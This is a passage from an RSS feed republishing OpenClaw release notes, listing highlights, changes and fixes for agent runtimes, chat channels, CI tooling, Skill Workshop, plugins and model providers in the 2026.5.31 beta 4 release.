<li>Agents: accept hidden <code>sessions_send</code> body aliases before validation while keeping the model-facing <code>message</code> schema canonical. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553200827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88229" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88229/hovercard" href="https://github.com/openclaw/openclaw/pull/88229">#88229</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Chat/UI: preserve startup chat sends during history loading, unblock the initial Control UI chat send, stream chat deltas incrementally, skip markdown parsing while streaming, keep drafts local while typing, guard composer rerenders, honor Chromium executable overrides, and detect system Chromium for E2E. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561424737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88998/hovercard" href="https://github.com/openclaw/openclaw/pull/88998">#88998</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels: preserve long Feishu streaming replies, send visible fallbacks when accepted Feishu turns produce no final reply, tolerate iMessage self-chat timestamp skew, preserve colon-prefixed slash commands in mention parsing, decode Nostr <code>npub</code> allowlists correctly, and suppress raw provider errors during channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545822590" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87896" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87896/hovercard" href="https://github.com/openclaw/openclaw/pull/87896">#87896</a>)</li>
<li>Config/status/doctor: skip unresolved shell references in state-dir dotenv files, resolve gateway auth secrets during deep status audits, respect explicit PI runtime policy, report runtime tool-schema errors, and keep post-upgrade JSON stable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554055557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88288/hovercard" href="https://github.com/openclaw/openclaw/pull/88288">#88288</a>)</li>
<li>Gateway/session state: list commands from the Gateway plugin registry, harden MCP loopback tool schemas, hide phantom agent-store rows from <code>sessions.list</code>, make task persistence failures explicit, and carry session UUIDs on interactive dispatch events.</li>
<li>OpenAI/TTS: handle speed directives for OpenAI TTS voices. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348062227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74089" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74089/hovercard" href="https://github.com/openclaw/openclaw/pull/74089">#74089</a>)</li>
<li>CI/Crabbox: keep default runner capacity on the Azure credit-backed on-demand D4 lane with the Azure SSH port and a Git-independent full check job, so broad validation avoids low-priority spot quota stalls, hydrate port mismatches, non-Git hydrated workspaces, and stale AWS region hints.</li>
<li>CI/Crabbox: route Crabbox wrapper and Testbox workflow edits to their regression tests so changed-test gates do not silently run zero specs.</li>
<li>CI/workflows: route workflow sanity helper edits to their guard tests and cover composite-action input interpolation checks.</li>
<li>CI/tooling: route CI scope, dependency, changelog, and docs helper edits to their owner tests instead of silently skipping changed-test coverage.</li>
<li>CI/tooling: route package, release, and install helper edits to their owner tests so changed-test gates cover publish and installer script changes.</li>
<li>CI/tooling: route shared script library edits through their owner tests so lock, process, safety, and scan helpers do not skip changed-test coverage.</li>
<li>CI/tooling: skip expensive import-graph scans once a changed diff already requires broad fallback, keeping local changed-test planning fast while still collecting explicit owner tests.</li>
<li>CI/tooling: route script edits through conventional owner tests when matching <code>test/scripts</code> or <code>src/scripts</code> coverage already exists.</li>
<li>CI/tooling: honor option terminators in the memory FD repro script so follow-on arguments are not reparsed.</li>
<li>Release/CI/E2E: assert plugin lifecycle runtime inspect output instead of only capturing it.</li>
<li>Release/CI/E2E: make gateway-network prove the advertised health RPC and retry early WebSocket closes without burning full open timeouts.</li>
<li>Release/CI/E2E: honor option terminators across release, Parallels smoke, plugin gauntlet, and extension-memory scripts.</li>
<li>Release/CI/E2E: fail plugin gateway gauntlet QA chunks when the requested suite summary is missing or invalid.</li>
<li>Performance: prebuild QA runtime probes with generated plugin assets but without CLI startup metadata.</li>
<li>Performance: skip declaration bundling for runtime-only CLI startup and gateway watch build profiles.</li>
<li>Performance: reuse prepared provider handles, strict tool schemas, gateway runtime metadata, session maintenance config, plugin metadata, bundled skill allowlists, package-local plugin artifacts, single-entry store writes, and validated/serialized session prompt blobs.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.5.31 beta 4]]></title>
<description><![CDATA[Highlights

Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (#88129, #88136, #88141, #88162, #88182)
Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Disc...]]></description>
<link>https://tsecurity.de/de/3561696/downloads/openclaw-2026531-beta-4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561696/downloads/openclaw-2026531-beta-4/</guid>
<pubDate>Mon, 01 Jun 2026 04:31:13 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Discord, Microsoft Teams, Google Chat, Google Meet, and iOS realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Gateway and channel setup add Tailscale Serve service-name binding, Communication notification settings, safer <code>agents add</code>, and more reliable progress drafts across Discord, Telegram, Slack, Matrix, and Teams. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354639496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74715/hovercard" href="https://github.com/openclaw/openclaw/pull/74715">#74715</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463729976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83115/hovercard" href="https://github.com/openclaw/openclaw/issues/83115">#83115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554276259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88314" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88314/hovercard" href="https://github.com/openclaw/openclaw/pull/88314">#88314</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558636505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88749" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88749/hovercard" href="https://github.com/openclaw/openclaw/pull/88749">#88749</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VladyslavLevchuk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VladyslavLevchuk">@VladyslavLevchuk</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Provider and plugin requests now bound more timers, retries, OAuth/device-code lifetimes, media downloads, local service probes, and generated-content polling paths before they can hang a run.</li>
<li>Skills, session metadata, gateway runtime state, plugin metadata, and store writes do less repeated work on hot paths while keeping config and dispatch behavior stable.</li>
<li>Skills and plugin loading now handle stale disabled snapshots and loader failures more clearly, so channel turns avoid disabled SecretRefs and operators get better recovery guidance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>Workboard, SecretRef plugin manifests, hosted iOS push relay, and external Copilot/Tokenjuice packaging add broader orchestration, integration, and plugin delivery surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544177368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87796/hovercard" href="https://github.com/openclaw/openclaw/pull/87796">#87796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550878888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88107/hovercard" href="https://github.com/openclaw/openclaw/pull/88107">#88107</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Skill Workshop now has a fuller Control UI flow with proposal lists, today actions, revision handoff, searchable file previews, review states, locale coverage, and reusable session routing.</li>
<li>Chat and Control UI startup paths keep sends alive through history loading, stream deltas incrementally, skip markdown work while streaming, and expose calmer composer controls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558851324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88772/hovercard" href="https://github.com/openclaw/openclaw/pull/88772">#88772</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559381540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88825/hovercard" href="https://github.com/openclaw/openclaw/pull/88825">#88825</a>)</li>
<li>Provider coverage and model metadata now include MiniMax M3, account OAuth endpoints, Google/Vertex catalog fixes, OpenRouter SQLite model caching, Copilot Claude 1M capabilities, Foundry reasoning alignment, and OpenAI response replay guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556082619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88480/hovercard" href="https://github.com/openclaw/openclaw/issues/88480">#88480</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556466505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88512" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88512/hovercard" href="https://github.com/openclaw/openclaw/pull/88512">#88512</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559632397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88851" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88851/hovercard" href="https://github.com/openclaw/openclaw/pull/88851">#88851</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559735267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88860/hovercard" href="https://github.com/openclaw/openclaw/pull/88860">#88860</a>)</li>
<li>iMessage monitor state, inbound queues, and plugin install ledgers moved toward SQLite-backed state so restarts and local monitors recover with less duplicate filesystem scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559074657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88794/hovercard" href="https://github.com/openclaw/openclaw/pull/88794">#88794</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559113281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88797" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88797/hovercard" href="https://github.com/openclaw/openclaw/pull/88797">#88797</a>)</li>
<li>Release, CI, Docker, E2E, and diagnostics lanes now cap more logs, response bodies, readiness probes, artifact checks, and status polling so failures report bounded proof instead of stalling.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Docs: add a dedicated Skill Workshop guide covering governed skill creation, reviewable proposals, CLI, Gateway, agent tool behavior, approval policy, support files, and recovery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let the <code>skill_workshop</code> agent tool apply, reject, and quarantine explicit proposals through the guarded review flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let proposals carry approved support files under standard skill folders, with scanner, hash, and rollback safeguards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let pending proposals be revised in place with versioned, dated proposal frontmatter before approval. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: add Skill Workshop with pending proposals, CLI/Gateway review actions, rollback metadata, and the <code>skill_workshop</code> agent tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skill Workshop: add the Control UI navigation, styled dashboard, proposal today view, revision dialog, file preview modal, searchable preview files, reusable session handoff, and localized strings.</li>
<li>Plugins: externalize Tokenjuice as the official <code>@openclaw/tokenjuice</code> plugin with npm and ClawHub publish metadata.</li>
<li>Plugins: externalize the GitHub Copilot agent runtime as the official <code>@openclaw/copilot</code> plugin with npm and ClawHub publish metadata.</li>
<li>iOS: add hosted push relay defaults, realtime Talk playback, and a guarded WebSocket ping path for more reliable mobile sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>iOS: support native iPad display layouts.</li>
<li>Workboard: add orchestration primitives and agent coordination tools for multi-agent planning and run tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>)</li>
<li>Workboard: wire task-backed board runs and show task comments in the edit modal.</li>
<li>Gateway: support Tailscale Serve service-name bindings for gateway exposure and status.</li>
<li>Code mode: add internal namespaces for scoped agent/global sessions and exact namespace tool dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549263089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88043/hovercard" href="https://github.com/openclaw/openclaw/pull/88043">#88043</a>)</li>
<li>Code mode: add MCP API files and docs for code-mode integrations.</li>
<li>Control UI: add a Dreaming-tab agent selector and propagate the selected agent through Dreaming status, diary, and diary actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395906736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78748/hovercard" href="https://github.com/openclaw/openclaw/pull/78748">#78748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</li>
<li>Control UI: add calmer chat composer controls for active chat entry. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558851324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88772/hovercard" href="https://github.com/openclaw/openclaw/pull/88772">#88772</a>)</li>
<li>Control UI: expose the Communication Notifications settings tab so notification controls are reachable from settings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354639496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74715/hovercard" href="https://github.com/openclaw/openclaw/pull/74715">#74715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VladyslavLevchuk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VladyslavLevchuk">@VladyslavLevchuk</a>.</li>
<li>Plugin SDK/channels: add typed presentation command actions so native slash-command and callback controls can round-trip through capable channel plugins without being reinterpreted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558368986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88721/hovercard" href="https://github.com/openclaw/openclaw/pull/88721">#88721</a>)</li>
<li>Plugins: add a SecretRef provider integration manifest contract and extract shared LLM core packages for provider/plugin reuse. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Plugins: persist the plugin install index in SQLite so installed package lookup survives reloads with less filesystem scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559074657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88794/hovercard" href="https://github.com/openclaw/openclaw/pull/88794">#88794</a>)</li>
<li>Providers: add MiniMax M3 model support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559735267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88860/hovercard" href="https://github.com/openclaw/openclaw/pull/88860">#88860</a>)</li>
<li>Doctor: add disk space health checks and stabilize post-upgrade JSON probes.</li>
<li>Channels: store inbound queues in SQLite and migrate iMessage monitor state to SQLite-backed tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559113281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88797" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88797/hovercard" href="https://github.com/openclaw/openclaw/pull/88797">#88797</a>)</li>
<li>Skills: add the core skills index and centralize skills runtime loading, status, filtering, and prompt formatting.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/TUI: keep local custom provider runs from loading plugin runtime and auth alias metadata when plugins are disabled.</li>
<li>Agents/TUI: restore in-flight TUI run switch-back behavior, keep no-policy native hook fallback available, guard vanished workspaces, and keep lightweight isolated subagents lightweight.</li>
<li>Agents/media: keep async image, music, and video generation starts from ending the Codex turn, so mixed requests can continue with summaries or other work while media renders in the background.</li>
<li>Agents/Codex: keep public OpenAI API-key profiles from being treated as native Codex app-server auth while preserving persisted Codex OAuth sessions.</li>
<li>Agents/Codex: stream Codex app-server final-answer partials to live reply previews, preserve ACP metadata in SQLite, prefer real tool results over synthetic repair output, and preserve workspace/session metadata through ACP runtime refactors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555235950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88405/hovercard" href="https://github.com/openclaw/openclaw/issues/88405">#88405</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558386594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88724/hovercard" href="https://github.com/openclaw/openclaw/pull/88724">#88724</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558459446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88730" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88730/hovercard" href="https://github.com/openclaw/openclaw/pull/88730">#88730</a>)</li>
<li>Control UI: keep collapsed tool cards labeled with the tool name and action instead of generic output text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: surface Skill Workshop guidance in Codex app-server prompts when <code>skill_workshop</code> is available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/auth: write auth profiles atomically, add force re-login recovery, preserve workspaces during state-only uninstall, and compact before oversized turns so recovery paths avoid partial state.</li>
<li>Skills: skip disabled skill env overrides from stale persisted snapshots so disabled skill <code>apiKey</code> SecretRefs cannot abort embedded or channel turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>CLI: avoid live catalog validation during <code>openclaw agents add</code>, so adding a secondary agent no longer depends on provider catalog availability. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370229397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76284/hovercard" href="https://github.com/openclaw/openclaw/issues/76284">#76284</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554276259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88314" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88314/hovercard" href="https://github.com/openclaw/openclaw/pull/88314">#88314</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CLI: keep <code>plugins list --json</code> on the snapshot-only path so plugin sweeps avoid loading the full runtime status graph.</li>
<li>CLI/desktop: bridge WSL clipboard operations through the shell and recognize manual-update launchd jobs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558805270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88764/hovercard" href="https://github.com/openclaw/openclaw/pull/88764">#88764</a>)</li>
<li>Plugins: make PixVerse external-plugin ClawHub metadata explicit and keep it out of bundled dist builds.</li>
<li>Plugins: clarify plugin loader failure guidance so missing or incompatible plugin packages point operators at the right repair path.</li>
